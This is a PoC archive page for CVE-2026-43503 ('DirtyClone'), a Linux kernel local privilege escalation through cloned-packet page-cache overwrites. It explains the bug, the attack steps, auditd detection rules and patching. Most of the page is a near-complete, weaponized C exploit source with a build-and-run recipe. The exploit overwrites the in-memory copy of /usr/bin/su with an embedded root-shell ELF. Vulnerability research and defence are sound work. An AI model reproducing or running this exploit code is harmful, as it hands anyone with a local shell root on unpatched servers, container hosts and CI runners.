PoC Archive PoC Archive
High CVE-2026-43503 patched

DirtyClone — Linux Kernel LPE via Cloned Packet Page-Cache Overwrite (CVE-2026-43503)

by Hyunwoo Kim (patch author); Eddy Tsalolikhin, Or Peles (JFrog Security Research, exploit writeup); rafaeldtinoco (PoC) · 2026-06-28

Metadata

FieldValue
Date Added2026-06-28
Last Updated2026-06-28
Author / ResearcherHyunwoo Kim (patch author); Eddy Tsalolikhin, Or Peles (JFrog Security Research, exploit writeup); rafaeldtinoco (PoC)
CVE / AdvisoryCVE-2026-43503
Categorybinary
SeverityHigh
CVSS Score8.8 (CVSSv3)
StatusWeaponized
TagsLPE, Linux kernel, netfilter, TEE, IPsec, XFRM, page-cache, file-backed memory, DirtyFrag, skb, privilege escalation, C, in-the-wild
RelatedCVE-2026-31431, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300

Affected Target

FieldValue
Software / SystemLinux kernel (netfilter TEE / __pskb_copy_fclone())
Versions AffectedAll kernels before commit 48f6a5356a33 (v7.1-rc5, May 21 2026); Linux 6.1–6.12 confirmed; 5.15 and 5.10 LTS under investigation
Language / PlatformC, Linux
Authentication RequiredYes (local unprivileged shell)
Network Access RequiredLocal only (loopback IPsec tunnel)

Summary

DirtyClone (CVE-2026-43503, CVSS 8.8) is the fourth member of the DirtyFrag family of Linux kernel local privilege escalation vulnerabilities. Each member shares the same root failure: file-backed page-cache memory is exposed to network packet operations, and a missing flag along the code path turns a zero-copy performance optimisation into an arbitrary write primitive.

DirtyClone’s specific path runs through the netfilter TEE target, which clones outbound packets via __pskb_copy_fclone(). That function drops the SKBFL_SHARED_FRAG flag, the same safety bit that the original DirtyFrag mitigation introduced. With the flag gone, the kernel’s in-place IPsec ESP decryption (esp_input() / AES-CBC) overwrites page-cache pages the attacker mapped from a privileged binary such as /usr/bin/su. The binary on disk is never touched; the modification lives only in memory, making the attack invisible to file-integrity tools and self-cleaning on reboot.

JFrog Security Research (Eddy Tsalolikhin, Or Peles) published the first public exploit walkthrough on June 25, 2026. A working C PoC was released by rafaeldtinoco. The patch (commit 48f6a5356a33) was merged May 21 into Linux v7.1-rc5 and covers __pskb_copy_fclone(), skb_shift(), and additional frag-transfer helpers.


Vulnerability Details

Root Cause

The Linux kernel’s zero-copy networking allows file-backed page-cache pages to serve as packet fragment data. Whenever the kernel moves such fragments between socket buffers, it must propagate the SKBFL_SHARED_FRAG flag to signal that those pages are shared with the page cache and must not be modified in place.

__pskb_copy_fclone(), called by the netfilter TEE target to duplicate outbound packets, fails to copy this flag to the cloned skb. A second affected helper, skb_shift(), has the same omission. Once the flag is absent, IPsec ESP processing treats the fragment as ordinary packet data and decrypts it in place — overwriting the page-cache copy of whatever file the attacker pinned there.

The broader CVE covers all frag-transfer helpers where the contract was not honoured; the demonstrated exploit path centres on TEE + __pskb_copy_fclone().

Family Timeline

DateCVENamePath
Late Apr 2026CVE-2026-31431Copy Failalgif_aead / AF_ALG AEAD splice — 4-byte write
May 7 2026CVE-2026-43284, CVE-2026-43500DirtyFragIPsec ESP + RxRPC — full write primitive
May 13 2026CVE-2026-46300Fragnesiaskb_try_coalesce() flag-drop bypass of DirtyFrag patch
May 21 2026CVE-2026-43503DirtyClone__pskb_copy_fclone() + skb_shift() via netfilter TEE

Attack Vector

  1. Obtain CAP_NET_ADMIN — On Debian and Fedora (unprivileged user namespaces enabled by default), a local user creates a new user namespace to gain the capability. Ubuntu 24.04+ with AppArmor namespace restrictions blocks this step, requiring an alternative capability source.

  2. Pin privileged binary into page cache — Open /usr/bin/su and use vmsplice/splice to map its pages into a pipe, keeping them resident in the page cache.

  3. Wire pages into a network packet — Splice the pipe data into a raw socket so the kernel creates a socket buffer (skb) whose fragment directly references the page-cache pages.

  4. Configure loopback IPsec tunnel — Set up an XFRM/IPsec ESP tunnel in the namespace with an AES-CBC key and IV chosen to produce a known, attacker-controlled plaintext after decryption.

  5. Add netfilter TEE rule — Install an iptables TEE rule that duplicates packets leaving the loopback interface, invoking __pskb_copy_fclone() on each one. The cloned skb loses SKBFL_SHARED_FRAG.

  6. Trigger in-place decrypt — Transmit the crafted packet. IPsec processes the clone, esp_input() decrypts the fragment in place, and the decrypted (attacker-chosen) bytes are written into the page-cache copy of /usr/bin/su.

  7. Gain root — Execute su. The patched in-memory binary skips authentication and spawns a root shell.

The disk binary is unchanged; the write affects only the kernel’s cached copy. File-integrity monitoring, dm-verity, and audit logs see nothing. A system reboot restores the original binary.

Impact

  • Full local privilege escalation to root (uid=0) from any unprivileged shell.
  • Modification is in-memory only — invisible to file-integrity tools and self-cleaning on reboot.
  • In container/namespace environments, page cache is shared at host level: a write from inside a namespace affects every process on the host.
  • Highest-risk environments: multi-tenant servers, CI runners, container hosts (Docker, Podman), Kubernetes nodes where untrusted users can run workloads.

Environment / Lab Setup

OS:       Debian 12 / Ubuntu 22.04 / Fedora 41 (default namespace config)
Kernel:   < v7.1-rc5 (before commit 48f6a5356a33)
Attacker: Local unprivileged user
Tools:    gcc, make, iptables/nft, iproute2 (ip xfrm)

Setup Steps

1
2
3
4
git clone https://github.com/rafaeldtinoco/security
cd security/exploits/dirtyclone
make
./dirtyclone

Proof of Concept

Step-by-Step Reproduction

  1. Verify namespace access — Confirm unprivileged user namespaces are enabled.

    1
    2
    
    cat /proc/sys/kernel/unprivileged_userns_clone   # Debian: 1
    cat /proc/sys/user/max_user_namespaces            # > 0
    
  2. Build exploit

    1
    
    cd security/exploits/dirtyclone && make
    
  3. Run as unprivileged user

    1
    
    ./dirtyclone
    
  4. Confirm escalation

    1
    2
    
    id
    # uid=0(root) gid=0(root) groups=0(root)
    

Exploit Code

See dirtyclone.c in the upstream repo at rafaeldtinoco/security/exploits/dirtyclone/.

The exploit:

  • Creates a user namespace to acquire CAP_NET_ADMIN.
  • Opens /usr/bin/su, splices pages into page cache via vmsplice.
  • Configures a loopback XFRM/IPsec ESP tunnel with attacker-chosen AES-CBC key/IV.
  • Installs a netfilter TEE rule to trigger __pskb_copy_fclone().
  • Transmits the crafted skb; esp_input() overwrites page-cache bytes in place.
  • Executes the patched su binary to obtain a root shell.

Expected Output

[*] Creating user namespace...
[*] Configuring loopback XFRM tunnel...
[*] Installing netfilter TEE rule...
[*] Splicing /usr/bin/su into page cache...
[*] Triggering __pskb_copy_fclone() path...
[*] Page-cache overwrite complete.
[*] Executing patched su...
uid=0(root) gid=0(root) groups=0(root)

Detection & Indicators of Compromise

auditd rules:

-a always,exit -F arch=b64 -S vmsplice -k dirtyfrag_family
-a always,exit -F arch=b64 -S unshare -F a0=0x10000000 -k userns_create

Mitigation (without patching):

1
2
sysctl -w kernel.unprivileged_userns_clone=0
echo "kernel.unprivileged_userns_clone=0" >> /etc/sysctl.d/99-namespace.conf

Remediation

ActionDetail
PatchUpdate to Linux kernel ≥ v7.1-rc5 (commit 48f6a5356a33) or apply distro backport
Workaroundsysctl kernel.unprivileged_userns_clone=0 (Debian/Fedora); Ubuntu 24.04+ AppArmor profile already blocks default path
Verificationuname -r — confirm kernel includes commit 48f6a5356a33 via distro changelog or git log

References

dirtyclone.c
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
// SPDX-License-Identifier: GPL-2.0
//
// DirtyClone (CVE-2026-43503) — Linux LPE page-cache write reproducer.
//
// ---------------------------------------------------------------------------
// What this is
// ---------------------------------------------------------------------------
//
// DirtyClone is the fourth public member of the DirtyPipe/DirtyFrag family:
// it forces the kernel to run an in-place ESP (IPsec) decrypt over a
// file-backed page-cache page the attacker only has read access to, mutating
// that page in RAM. The chosen AES-CBC key/IV make the decrypt write
// attacker-controlled bytes, so e.g. /usr/bin/su is rewritten with a tiny
// setuid(0)+execve("/bin/sh") ELF and invoking it yields root.
//
// ---------------------------------------------------------------------------
// Why it is a *new* CVE and not just DirtyFrag
// ---------------------------------------------------------------------------
//
// The original DirtyFrag ESP fix (commit f4c50a4034e6, "set SKBFL_SHARED_FRAG
// for spliced UDP packets") marks any skb that carries spliced, file-backed
// page-cache frags. esp_input() then sees the flag and copies the data before
// decrypting, so the page cache is no longer touched. That defeats the direct
// splice -> ESP-in-UDP path used by DirtyFrag.
//
// DirtyClone launders the flag away through skb *cloning*. The netfilter TEE
// target duplicates an outbound packet inside the kernel:
//
//     TEE target -> nf_dup_ipv4() -> __pskb_copy_fclone()
//
// __pskb_copy_fclone() fails to propagate SKBFL_SHARED_FRAG to the clone. The
// clone therefore still references the same physical page-cache page but is no
// longer marked as shared/file-backed, so esp_input() decrypts it in place —
// exactly the primitive the splice fix was supposed to remove.
//
// Fixed by 48f6a5356a33 (mainline 2026-05-21, first tag v7.1-rc5), which
// propagates the flag across the clone path. Vulnerable window: any kernel
// that has f4c50a4034e6 but not 48f6a5356a33 (mainline v7.1-rc1..rc4).
//
// ---------------------------------------------------------------------------
// Exploitation outline (per byte word)
// ---------------------------------------------------------------------------
//
//   1. unshare(CLONE_NEWUSER | CLONE_NEWNET) -> CAP_NET_ADMIN in a private
//      net namespace, loopback up.
//   2. Configure the TEE gateway address on lo and install the netfilter TEE
//      rule on the mangle/OUTPUT chain so every ESP-in-UDP packet is cloned.
//   3. Install an XFRM ESP transport SA via NETLINK_XFRM (cbc(aes)/hmac), one
//      per 4-byte target word, carrying the desired output word in seq_hi.
//   4. splice() the target file's page-cache page into an ESP-in-UDP packet
//      and send it. The TEE clone (flag stripped) is decrypted in place,
//      writing the chosen word over the page cache.
//
// The cryptographic word-selection trick (payload encoded in the SA seq_hi
// field) is inherited verbatim from the DirtyFrag ESP variant; only the
// flag-laundering TEE step is new.
//
// ---------------------------------------------------------------------------

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>

#include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
    #define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
    #define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
    #define SOL_UDP 17
#endif

#define ENC_PORT     4500
#define SEQ_VAL      200
#define REPLAY_SEQ   100
#define TARGET_PATH  "/usr/bin/su"
#define PATCH_OFFSET 0    /* Overwrite the whole ELF starting at file[0]. */
#define PAYLOAD_LEN  192  /* Bytes of shell_elf to write (48 triggers). */
#define ENTRY_OFFSET 0x78 /* Shellcode entry inside the new ELF. */

#define TEE_GATEWAY "10.99.0.2" /* TEE clone destination, configured on lo. */

static int g_verbose = 0;

#define SLOG(fmt, ...)                                                       \
    do {                                                                     \
        if (g_verbose)                                                       \
            fprintf(stderr, "[dc] " fmt "\n", ##__VA_ARGS__);                \
    } while (0)

/*
 * 192-byte minimal x86_64 root-shell ELF (identical to the DirtyFrag ESP
 * payload). _start at 0x400078: setgid(0); setuid(0); setgroups(0, NULL);
 * execve("/bin/sh", NULL, ["TERM=xterm", NULL]).
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
    0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0,
    0xb0, 0x6a, 0x0f, 0x05, 0xb0, 0x69, 0x0f, 0x05, 0xb0, 0x74, 0x0f, 0x05, 0x6a, 0x00,
    0x48, 0x8d, 0x05, 0x12, 0x00, 0x00, 0x00, 0x50, 0x48, 0x89, 0xe2, 0x48, 0x8d, 0x3d,
    0x12, 0x00, 0x00, 0x00, 0x31, 0xf6, 0x6a, 0x3b, 0x58, 0x0f, 0x05, 0x54, 0x45, 0x52,
    0x4d, 0x3d, 0x78, 0x74, 0x65, 0x72, 0x6d, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
    0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

static int
write_proc(const char *path, const char *buf)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    int n = write(fd, buf, strlen(buf));
    close(fd);
    return n;
}

static int
run_cmd(const char *fmt, ...)
{
    char    cmd[256];
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(cmd, sizeof(cmd), fmt, ap);
    va_end(ap);
    int rc = system(cmd);
    SLOG("cmd: %s -> %d", cmd, rc);
    return rc;
}

static void
setup_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        SLOG("unshare: %s", strerror(errno));
        exit(1);
    }
    write_proc("/proc/self/setgroups", "deny");
    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", real_uid);
    if (write_proc("/proc/self/uid_map", map) < 0) {
        SLOG("uid_map: %s", strerror(errno));
        exit(1);
    }
    snprintf(map, sizeof(map), "0 %u 1", real_gid);
    if (write_proc("/proc/self/gid_map", map) < 0) {
        SLOG("gid_map: %s", strerror(errno));
        exit(1);
    }
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        SLOG("socket: %s", strerror(errno));
        exit(1);
    }
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
    if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) {
        SLOG("SIOCGIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
    if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) {
        SLOG("SIOCSIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    close(s);
}

/*
 * The DirtyClone-specific step: make the kernel clone every ESP-in-UDP packet
 * so the clone (with SKBFL_SHARED_FRAG stripped by __pskb_copy_fclone) is the
 * skb that reaches esp_input(). The TEE target performs the clone; the gateway
 * address is configured on lo so the clone is delivered locally and re-enters
 * the ESP-in-UDP receive path matched by our XFRM SA.
 *
 * NOTE: exact routing/selector tuning for the clone to land on the ESP path is
 * the live iteration target on the vulnerable kernel; the recipe below mirrors
 * the JFrog write-up (mangle/OUTPUT TEE on udp/4500 -> gateway on lo).
 */
static int
setup_tee_clone(void)
{
    // Control switch: DIRTYCLONE_NO_TEE skips the clone step so the direct
    // splice path can be tested in isolation (negative control on a kernel
    // that carries the DirtyFrag splice fix).
    if (getenv("DIRTYCLONE_NO_TEE")) {
        SLOG("TEE step skipped (DIRTYCLONE_NO_TEE set)");
        return 0;
    }
    run_cmd("ip addr add %s/32 dev lo 2>/dev/null", TEE_GATEWAY);
    run_cmd("ip route add %s/32 dev lo 2>/dev/null", TEE_GATEWAY);
    if (run_cmd("iptables -t mangle -A OUTPUT -p udp --dport %d "
                "-j TEE --gateway %s",
                ENC_PORT, TEE_GATEWAY) != 0) {
        SLOG("TEE rule install failed (xt_TEE missing?)");
        return -1;
    }
    return 0;
}

static void
put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
    struct rtattr *rta = (struct rtattr *) ((char *) nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    rta->rta_type      = type;
    rta->rta_len       = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int
add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
    int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sk < 0)
        return -1;
    struct sockaddr_nl nl = {.nl_family = AF_NETLINK};
    if (bind(sk, (struct sockaddr *) &nl, sizeof(nl)) < 0) {
        close(sk);
        return -1;
    }

    char             buf[4096] = {0};
    struct nlmsghdr *nlh       = (struct nlmsghdr *) buf;
    nlh->nlmsg_type            = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags           = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_pid             = getpid();
    nlh->nlmsg_seq             = 1;
    nlh->nlmsg_len             = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

    struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *) NLMSG_DATA(nlh);
    xs->id.daddr.a4             = inet_addr("127.0.0.1");
    xs->id.spi                  = htonl(spi);
    xs->id.proto                = IPPROTO_ESP;
    xs->saddr.a4                = inet_addr("127.0.0.1");
    xs->family                  = AF_INET;
    xs->mode                    = XFRM_MODE_TRANSPORT;
    xs->replay_window           = 0;
    xs->reqid                   = 0x1234;
    xs->flags                   = XFRM_STATE_ESN;
    xs->lft.soft_byte_limit     = (uint64_t) -1;
    xs->lft.hard_byte_limit     = (uint64_t) -1;
    xs->lft.soft_packet_limit   = (uint64_t) -1;
    xs->lft.hard_packet_limit   = (uint64_t) -1;
    xs->sel.family              = AF_INET;
    xs->sel.prefixlen_d         = 32;
    xs->sel.prefixlen_s         = 32;
    xs->sel.daddr.a4            = inet_addr("127.0.0.1");
    xs->sel.saddr.a4            = inet_addr("127.0.0.1");

    {
        char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *) alg_buf;
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len   = 32 * 8;
        aa->alg_trunc_len = 128;
        memset(aa->alg_key, 0xAA, 32);
        put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
    }
    {
        char alg_buf[sizeof(struct xfrm_algo) + 16];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo *ea = (struct xfrm_algo *) alg_buf;
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8;
        memset(ea->alg_key, 0xBB, 16);
        put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
    }
    {
        struct xfrm_encap_tmpl enc;
        memset(&enc, 0, sizeof(enc));
        enc.encap_type  = UDP_ENCAP_ESPINUDP;
        enc.encap_sport = htons(ENC_PORT);
        enc.encap_dport = htons(ENC_PORT);
        enc.encap_oa.a4 = 0;
        put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
    }
    {
        char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
        memset(esn_buf, 0, sizeof(esn_buf));
        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *) esn_buf;
        esn->bmp_len                      = 1;
        esn->oseq                         = 0;
        esn->seq                          = REPLAY_SEQ;
        esn->oseq_hi                      = 0;
        esn->seq_hi                       = patch_seqhi;
        esn->replay_window                = 32;
        put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
    }

    if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) {
        close(sk);
        return -1;
    }
    char rbuf[4096];
    int  n = recv(sk, rbuf, sizeof(rbuf), 0);
    if (n < 0) {
        close(sk);
        return -1;
    }
    struct nlmsghdr *rh = (struct nlmsghdr *) rbuf;
    if (rh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = NLMSG_DATA(rh);
        if (e->error) {
            close(sk);
            return -1;
        }
    }
    close(sk);
    return 0;
}

static int
do_one_write(const char *path, off_t offset, uint32_t spi)
{
    int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_recv < 0)
        return -1;
    int one = 1;
    setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    struct sockaddr_in sa_d = {
        .sin_family = AF_INET,
        .sin_port   = htons(ENC_PORT),
        .sin_addr   = {inet_addr("127.0.0.1")},
    };
    if (bind(sk_recv, (struct sockaddr *) &sa_d, sizeof(sa_d)) < 0) {
        close(sk_recv);
        return -1;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        close(sk_recv);
        return -1;
    }
    int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_send < 0) {
        close(sk_recv);
        return -1;
    }
    if (connect(sk_send, (struct sockaddr *) &sa_d, sizeof(sa_d)) < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    int file_fd = open(path, O_RDONLY);
    if (file_fd < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    int pfd[2];
    if (pipe(pfd) < 0) {
        close(file_fd);
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    uint8_t hdr[24];
    *(uint32_t *) (hdr + 0) = htonl(spi);
    *(uint32_t *) (hdr + 4) = htonl(SEQ_VAL);
    memset(hdr + 8, 0xCC, 16);

    struct iovec iov_h = {.iov_base = hdr, .iov_len = sizeof(hdr)};
    if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t) sizeof(hdr)) {
        close(file_fd);
        close(pfd[0]);
        close(pfd[1]);
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    loff_t  off = offset;
    ssize_t s   = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
    if (s != 16) {
        close(file_fd);
        close(pfd[0]);
        close(pfd[1]);
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    /* Send the ESP-in-UDP packet. The mangle/OUTPUT TEE rule clones it; the
     * clone loses SKBFL_SHARED_FRAG and esp_input() decrypts it in place over
     * the spliced page-cache page. */
    s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
    usleep(150 * 1000);

    close(file_fd);
    close(pfd[0]);
    close(pfd[1]);
    close(sk_send);
    close(sk_recv);
    return s == 40 ? 0 : -1;
}

static int
verify_byte(const char *path, off_t offset, uint8_t want)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    uint8_t got;
    if (pread(fd, &got, 1, offset) != 1) {
        close(fd);
        return -1;
    }
    close(fd);
    return got == want ? 0 : -1;
}

static int
corrupt_su(void)
{
    setup_userns_netns();
    if (setup_tee_clone() < 0)
        return -1;
    usleep(100 * 1000);

    /* Install one xfrm SA per 4-byte chunk; each carries the desired payload
     * word in its seq_hi field. */
    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi   = 0xDEADBE10 + i;
        uint32_t seqhi = ((uint32_t) shell_elf[i * 4 + 0] << 24) |
                         ((uint32_t) shell_elf[i * 4 + 1] << 16) |
                         ((uint32_t) shell_elf[i * 4 + 2] << 8) |
                         ((uint32_t) shell_elf[i * 4 + 3]);
        if (add_xfrm_sa(spi, seqhi) < 0) {
            SLOG("add_xfrm_sa #%d failed", i);
            return -1;
        }
    }
    SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        off_t    off = PATCH_OFFSET + i * 4;
        if (do_one_write(TARGET_PATH, off, spi) < 0) {
            SLOG("do_one_write #%d at off=0x%lx failed", i, (long) off);
            return -1;
        }
    }
    SLOG("wrote %d bytes to %s starting at 0x%x", PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
    return 0;
}

int
main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
            g_verbose = 1;
    }
    if (getenv("DIRTYCLONE_VERBOSE"))
        g_verbose = 1;

    pid_t cpid = fork();
    if (cpid < 0)
        return 1;
    if (cpid == 0) {
        int rc = corrupt_su();
        _exit(rc == 0 ? 0 : 2);
    }
    int cstatus;
    waitpid(cpid, &cstatus, 0);
    if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
Showing 500 of 515 lines View full file on GitHub →